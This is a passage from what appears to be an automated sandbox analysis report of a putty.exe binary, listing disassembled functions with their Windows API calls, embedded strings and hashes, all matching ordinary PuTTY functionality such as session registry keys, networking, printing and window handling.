                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$Cursor$_strcat$ClassFileLoadLongModuleNameShow_strncpy
                            • String ID: ..\windows\window.c
                            • API String ID: 2777737826-1664963243
                            • Opcode ID: 4009f81d77ccc9d43b3745e67eddd066f12ee0ad4760829e11a4968cc5b8e155
                            • Instruction ID: 17cb79acd1abae785f7d086ca9660add5e376f62eb0ea7cb8d1effa2ecb0fe7a
                            • Opcode Fuzzy Hash: 4009f81d77ccc9d43b3745e67eddd066f12ee0ad4760829e11a4968cc5b8e155
                            • Instruction Fuzzy Hash: FFF0C870508621AFCB105F14FC49A6A7765FF48762F54453BFD05D22A1C7248840D79D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00449A1F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449A31
                            • _strlen.LIBCMT ref: 00449A41
                            • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 00449A63
                            • RegCloseKey.ADVAPI32(?,?,00403989,?), ref: 00449A73
                            Strings
                            • Software\SimonTatham\PuTTY\Sessions, xrefs: 00449A27
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CloseDeleteOpen_strlen
                            • String ID: Software\SimonTatham\PuTTY\Sessions
                            • API String ID: 708735351-490553574
                            • Opcode ID: e92e533d0a536248dfd4cc6c4f3b1a325c0995f74205660f5da03b7057a86d82
                            • Instruction ID: c0712e5c5b9be1599c1a18693df33d49bb08bbc0d18ea949d709b1c9d4e76d78
                            • Opcode Fuzzy Hash: e92e533d0a536248dfd4cc6c4f3b1a325c0995f74205660f5da03b7057a86d82
                            • Instruction Fuzzy Hash: E1F09032504208BBDB15ABA1FC0AD9F3BA9EF04764B20007AF905A51A2DF758F80969C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D778 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29networkCOMMON
                            Download Yara Rule
                            APIs
                            • WSAAsyncSelect.WS2_32(?,00000000,00000000,00000000), ref: 0043D7A3
                            • WSAGetLastError.WS2_32 ref: 0043D7AE
                            Strings
                            • WSAAsyncSelect(): unknown error, xrefs: 0043D7BB
                            • Network is down, xrefs: 0043D7C1
                            • do_select(): internal error (hwnd==NULL), xrefs: 0043D796
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AsyncErrorLastSelect
                            • String ID: Network is down$WSAAsyncSelect(): unknown error$do_select(): internal error (hwnd==NULL)
                            • API String ID: 1263927367-3348130660
                            • Opcode ID: 38b157c1a116adf9fb1fec2082fec66a4bf0d223fdc2c75a45d4591434be1985
                            • Instruction ID: d8ad936112f6afae7105f0503abe192df5ac8d34cc654d8f36d5eb27c52fe9e0
                            • Opcode Fuzzy Hash: 38b157c1a116adf9fb1fec2082fec66a4bf0d223fdc2c75a45d4591434be1985
                            • Instruction Fuzzy Hash: C0E09B74A142015BD7184A34AC496372656E7C4711FD4D536B115C13E0EB3CCCC4991D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044EDD4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(mscoree.dll,0044EF2D,00454B9B,?,0044EF4D,00000000), ref: 0044EDD9
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044EDE9
                            • ExitProcess.KERNEL32 ref: 0044EDFD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressExitHandleModuleProcProcess
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 75539706-1276376045
                            • Opcode ID: 2aa5d976c6fda9b7bce11038137cf45bcf6b130724ac856ab0121fbbcf0976c6
                            • Instruction ID: dda5de48f8a4bc4c0cff22cee8a3fcdd34bb1cf4ce5ef44a27345f33f6b1cdf6
                            • Opcode Fuzzy Hash: 2aa5d976c6fda9b7bce11038137cf45bcf6b130724ac856ab0121fbbcf0976c6
                            • Instruction Fuzzy Hash: 10D0C974A08313AFEA111BA1AD09A1A3A69FF80B06F0088B5B409D0163DF78C8009A69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00455B8A Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,004512C1,?), ref: 00455C3D
                            • InterlockedExchange.KERNEL32(00477430,00000001), ref: 00455CBB
                            • InterlockedExchange.KERNEL32(00477430,00000000), ref: 00455D20
                            • InterlockedExchange.KERNEL32(00477430,00000001), ref: 00455D44
                            • InterlockedExchange.KERNEL32(00477430,00000000), ref: 00455DA4
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ExchangeInterlocked$QueryVirtual
                            • String ID:
                            • API String ID: 2947987494-0
                            • Opcode ID: 051651005655a7c13f4474d182efc1014cd8deb04fde503e0deb2f89dd655e46
                            • Instruction ID: 18c739147445028ae4d30d60d493b995b745f2355266f19a644ac7e97f876dcb
                            • Opcode Fuzzy Hash: 051651005655a7c13f4474d182efc1014cd8deb04fde503e0deb2f89dd655e46
                            • Instruction Fuzzy Hash: B451B632A04F058BDB258F18D8E877A73B1EB41716F64816BDC4597293D378D88EC64C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044F179 Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?,00470420,00000060), ref: 0044F198
                            • GetCommandLineA.KERNEL32(?,00470420,00000060), ref: 0044F231
                            • GetStartupInfoA.KERNEL32(?), ref: 0044F285
                            • __wincmdln.LIBCMT ref: 0044F28B
                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0044F2A8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: HandleModule$CommandInfoLineStartup__wincmdln
                            • String ID:
                            • API String ID: 2870838941-0
                            • Opcode ID: d6836be353f953c79a9b8cd88fc15819399bf84dbd2c82b5385bc477fdfcd308
                            • Instruction ID: 0a8bd9fb1c33788d225a06372ca46041879257b4a051bf902819ce09cc31220d
                            • Opcode Fuzzy Hash: d6836be353f953c79a9b8cd88fc15819399bf84dbd2c82b5385bc477fdfcd308
                            • Instruction Fuzzy Hash: 50319571D04225DAEB21BF72DC0566E3664BF00319F20447FF814AA192EA7D8D8ACB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004400AA Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                            Download Yara Rule
                            APIs
                            • GlobalLock.KERNEL32(?), ref: 004400CC
                            • _strlen.LIBCMT ref: 00440136
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000), ref: 00440147
                            • _strlen.LIBCMT ref: 0044015F
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 0044016C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_strlen$GlobalLock
                            • String ID:
                            • API String ID: 2105387149-0
                            • Opcode ID: 7787a1b81202c22d7a5c3b7b47c75ae0fbfda7ac0f1d3e28bcc322be8a4afdbf
                            • Instruction ID: c64b9d966343ca014ab9334fa9ace9488012161187604ae350c8199647293955
                            • Opcode Fuzzy Hash: 7787a1b81202c22d7a5c3b7b47c75ae0fbfda7ac0f1d3e28bcc322be8a4afdbf
                            • Instruction Fuzzy Hash: E121FF72510204BEE7306B25EC48C3B7BADEF84364310403BFA49C72A1DB794C928BAC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044AF76 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0044AF9B
                            • GetSaveFileNameA.COMDLG32(?,?,?,00000000), ref: 0044AFCE
                            • GetOpenFileNameA.COMDLG32(?,?,?,00000000), ref: 0044AFD6
                            • GetCurrentDirectoryA.KERNEL32(00000104,00000000), ref: 0044AFE5
                            • SetCurrentDirectoryA.KERNEL32(?), ref: 0044B002
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CurrentDirectory$FileName$OpenSave
                            • String ID:
                            • API String ID: 3193246104-0
                            • Opcode ID: d06b8eed592a4a0892e4a6aa63559899b34aaca01c875f3ea3a23466168c8ac2
                            • Instruction ID: 1ca0749e5df5781574c032804fdddd7d376c287da75d1ded800feaa2e1400659
                            • Opcode Fuzzy Hash: d06b8eed592a4a0892e4a6aa63559899b34aaca01c875f3ea3a23466168c8ac2
                            • Instruction Fuzzy Hash: 9C114CB02002199BFF219F65DC84BAB77A8AB01355F044077E90586280C7B8DD59CBAA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00448D54 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • OpenPrinterA.WINSPOOL.DRV(?,00000000,00000000), ref: 00448D71
                            • StartDocPrinterA.WINSPOOL.DRV(00000000,00000001,?,?,00000000,00000000), ref: 00448D94
                            • StartPagePrinter.WINSPOOL.DRV(00000000,00000000,00000001,?,?,00000000,00000000), ref: 00448D9F
                            • EndDocPrinter.WINSPOOL.DRV(00000000,00000000,00000000,00000001,?,?,00000000,00000000), ref: 00448DAA
                            • ClosePrinter.WINSPOOL.DRV(00000000,?,00000000,00000000), ref: 00448DB6
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Printer.$PrinterStart$CloseOpenPage
                            • String ID:
                            • API String ID: 3064761797-0
                            • Opcode ID: 17efe211c21e8e27d5b3a4a0966b14223409c99fc88242cae39085ce730475a4
                            • Instruction ID: 7ab734fc1e29edb078eb04d9de3b90ffe191962f415dd14d0552d83495b2103c
                            • Opcode Fuzzy Hash: 17efe211c21e8e27d5b3a4a0966b14223409c99fc88242cae39085ce730475a4
                            • Instruction Fuzzy Hash: E801A771E01204B6FB606F628C02B9E76E89F10398F24446FFD40A51D1EFB9C940C65C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004549EE Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00454A09
                            • GetCurrentProcessId.KERNEL32 ref: 00454A15
                            • GetCurrentThreadId.KERNEL32 ref: 00454A1D
                            • GetTickCount.KERNEL32 ref: 00454A25
                            • QueryPerformanceCounter.KERNEL32(?), ref: 00454A31
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                            • String ID:
                            • API String ID: 1445889803-0
                            • Opcode ID: c8f76be6222b952586c7f21c4935fdb1146f2b9f5f7c739736ef38f375e5f868
                            • Instruction ID: 144437b6cf91993cb75fc3473a5fa186c3870e1ca2f05d2f0fdddc924e2b987c
                            • Opcode Fuzzy Hash: c8f76be6222b952586c7f21c4935fdb1146f2b9f5f7c739736ef38f375e5f868
                            • Instruction Fuzzy Hash: ACF0FF76C402159BCF109FF4ED4859EB7F8BB18346B810971F815EB222E734EE408A99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00408D27 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen_wctomb_s
                            • String ID: %H%M%S$&
                            • API String ID: 460730607-2392927110
                            • Opcode ID: d75d4151646ba046e9dfc78db5408f77b4ad3bba1b983f1b7975a0b9aa852e73
                            • Instruction ID: a76c4589fcf225aa19bbc2802b3de2c11d0abea2a9fe968d60428d6f526c22da
                            • Opcode Fuzzy Hash: d75d4151646ba046e9dfc78db5408f77b4ad3bba1b983f1b7975a0b9aa852e73
                            • Instruction Fuzzy Hash: 16410471C04248ABDF119F988881BEEBBB5EF14304F28056FF880B62C2DB785A41D79D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004385A5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: * VShell$*wildcard == '*'$..\wildcard.c
                            • API String ID: 4218353326-3122237257
                            • Opcode ID: 7fdad7de492d9a904f8bf3ed01f2a1dda50bf2beb30d6d7ab8266590eaa2a4c9
                            • Instruction ID: 437080bf39f59583a646ef6ab90aeb7dd78b46f1fe6338e6b56b71e33877e597
                            • Opcode Fuzzy Hash: 7fdad7de492d9a904f8bf3ed01f2a1dda50bf2beb30d6d7ab8266590eaa2a4c9
                            • Instruction Fuzzy Hash: 3731B371504348BEDB118E64C4417DABBE8AB09354F18905FFC599B241EF38EA818B99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044071C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0043F60F: _strlen.LIBCMT ref: 0043F623
                              • Part of subcall function 0043F60F: _strcat.LIBCMT ref: 0043F637
                              • Part of subcall function 0043F60F: IsIconic.USER32(?), ref: 0043F656
                              • Part of subcall function 0043F60F: SetWindowTextA.USER32(?), ref: 0043F667
                              • Part of subcall function 0043F5AF: _strlen.LIBCMT ref: 0043F5C3
                              • Part of subcall function 0043F5AF: _strcat.LIBCMT ref: 0043F5D7
                              • Part of subcall function 0043F5AF: IsIconic.USER32(?), ref: 0043F5F6
                              • Part of subcall function 0043F5AF: SetWindowTextA.USER32(?,?), ref: 0043F607
                            • DeleteMenu.USER32(00474DCC,00000040,00000000), ref: 004407B3
                            • InsertMenuA.USER32(00474DCC,00000030,00000000,00000040,&Restart Session), ref: 004407C5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: IconicMenuTextWindow_strcat_strlen$DeleteInsert
                            • String ID: %.70s (inactive)$&Restart Session
                            • API String ID: 2110450105-504084663
                            • Opcode ID: 87b1103a9dac7caeb38ac150135e2a42b94e2da0bff695a4d9e7f22751c9f517
                            • Instruction ID: 1ae2d56a248df0375c8fb19da0c87c346256b5a23a6e2f6cf75a812393a68ae2
                            • Opcode Fuzzy Hash: 87b1103a9dac7caeb38ac150135e2a42b94e2da0bff695a4d9e7f22751c9f517
                            • Instruction Fuzzy Hash: ED11C1B1900304BFE710AF65ECC6E1A3BACEB84349B50003AF64C97162C778A894CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043F7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63windowCOMMON
                            Download Yara Rule
                            APIs
                            • SetPaletteEntries.GDI32(?,00000000,00000106,-00000004), ref: 0043F83C
                            • RealizePalette.GDI32(00000000), ref: 0043F84F
                            • InvalidateRect.USER32(00000000,00000001,?,?,?,004365EE,?), ref: 0043F868
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Palette$EntriesInvalidateRealizeRect
                            • String ID: MG
                            • API String ID: 3902011370-1230926311
                            • Opcode ID: 9e76dd6e80a15470e09a3d9720cc31ded5ffd23f8a0f2ed47ae57a53c0f291b6
                            • Instruction ID: 1bbb289a681de37d872230c9179721e3b8193c9104355f883501b3a8bb96af97
                            • Opcode Fuzzy Hash: 9e76dd6e80a15470e09a3d9720cc31ded5ffd23f8a0f2ed47ae57a53c0f291b6
                            • Instruction Fuzzy Hash: 0111382280C7C05EE3154B35AC98B95BFA69F9A315F19C1FAE5894B3A2C7AA4009C318
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B1C1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 0043B247
                            • SendDlgItemMessageA.USER32(?,?,00000151,00000000,?), ref: 0043B257
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B1F3
                            • c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 0043B1F8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                            • API String ID: 3015471070-3468507388
                            • Opcode ID: d7fd7252175438cc0318d8f152ed1a3abd819aa2ba3e91cb7950fbf9208504bb
                            • Instruction ID: f37d39dc1f9ec13764e6d0f0d2845224edecd067f17e222eca1d256845095901
                            • Opcode Fuzzy Hash: d7fd7252175438cc0318d8f152ed1a3abd819aa2ba3e91cb7950fbf9208504bb
                            • Instruction Fuzzy Hash: 5E118CB1600104AFEF209E44DCC0E6B776AFB49354F11916BFA198B220C7399D50CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00447670 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: ..\windows\winnet.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
                            • API String ID: 2009864989-3201592796
